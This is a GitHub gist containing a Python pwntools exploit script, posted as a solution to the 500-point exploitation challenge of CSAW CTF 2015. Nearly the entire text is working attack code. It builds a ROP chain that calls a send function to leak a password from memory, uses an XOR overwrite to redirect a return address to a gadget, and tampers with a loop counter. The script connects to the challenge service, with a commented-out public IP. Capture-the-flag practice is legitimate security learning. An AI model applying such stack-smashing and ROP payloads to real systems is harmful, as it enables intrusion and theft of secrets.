Skip to content

Instantly share code, notes, and snippets.

@vanhoefm
Created September 21, 2015 02:24
Show Gist options
  • Save vanhoefm/b370aea6e246bc8732eb to your computer and use it in GitHub Desktop.
Save vanhoefm/b370aea6e246bc8732eb to your computer and use it in GitHub Desktop.
Solution for exploiting 500 challenge of CSAW CTF 2015
#!/usr/bin/env python2
from pwn import *
# Stack layout of vulnerable functions:
#
# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#
payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
# will call func_72, with buffer of 0x84 bytes
payload += pack(0) # next ROP chain
payload += pack(4) # socket file descriptor
payload += pack(0x0805F0C0) # address of password
payload += pack(0x100) # length of password
payload += pack(0) # flags for read call
payload += pack(0) * ((0x84-len(payload)) / 4) # padding so we can now overwrite variables
log.info("Constructed stack frame of 0x%x bytes" % len(payload))
# stack layout when entering function:
#
# [return-addr][buffer][size-read][???][???][???][???][bytes_read][buffer-data]
#
# 0xffffd63c: 0x08056afa 0xffffd65c 0x00000030 0x00000100
# 0xffffd64c: 0x00000000 0xf7ffda54 0x00000001 0x00000030
# 0xffffd65c: 0x08048740 0x00000000 0x00000004 0x0805F0C0
#
payload += pack(0) * 4 # skip canary, align, and saved-ebp
payload += pack(0x8056AFA ^ 0x80578F5) # let XOR write address of ROP gadget "7-pop; ret"
payload += pack(0) # ignore buffer pointer
payload += pack((len(payload) + 4 - 1) ^ 1) # overwrite counter variable for early stop
r = remote('localhost', 24242)
#r = remote('54.152.37.20', 24242)
log.info("Sending {} bytes payload: {}".format(len(payload), repr(payload)))
r.send(payload)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment